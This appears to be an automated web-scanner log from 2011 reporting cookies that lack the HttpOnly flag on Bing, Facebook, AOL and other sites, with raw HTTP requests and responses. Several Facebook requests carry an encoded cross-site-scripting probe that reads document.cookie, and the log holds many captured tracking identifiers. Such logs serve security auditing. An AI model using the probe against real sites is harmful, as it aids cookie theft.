GET /shopping/healthy-cooking/r/151 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/makeup/c/4259 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/swimwear/c/4503 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/browse?mkt=en-us&vid= HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: http://www.bing.com/videos/browse P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:52:16 GMT Connection: close Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/ Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll>1=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL>1=42008 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL>1=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll>1=31036 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL>1=42008 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
dcisid=2393165244.2413314893.404292352; path=/
bandType=broadband;DOMAIN=.aol.com;PATH=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393165244.2413314893.404292352; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:17 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31057 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld04 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /prowidget.php?s=1138&scrfr=0.43571354166666665&ref=http://news.ycombinator.com/news HTTP/1.1 Host: www.co2stats.com Proxy-Connection: keep-alive Referer: http://news.ycombinator.com/news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.collectspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2 Content-Type: text/html; charset=UTF-8 Date: Sun, 30 Jan 2011 03:05:28 GMT Accept-Ranges: bytes Connection: close Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/ Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT Content-Length: 35661
<HTML> <HEAD> <META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=GX4VM; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:38 GMT Content-Length: 11463
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HelenASPopkin HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:48 GMT Content-Length: 14974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:50 GMT Content-Length: 10625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /todd.kenreck HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:49 GMT Content-Length: 14802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1 Host: www.hoovers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:53:36 GMT Server: Apache Cache-Control: max-age=3600 Expires: Sun, 30 Jan 2011 02:53:36 GMT X-Powered-By: PHP/5.2.8 Content-Type: text/html Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/ P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE" Connection: close Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/ Content-Length: 18009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Take Th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
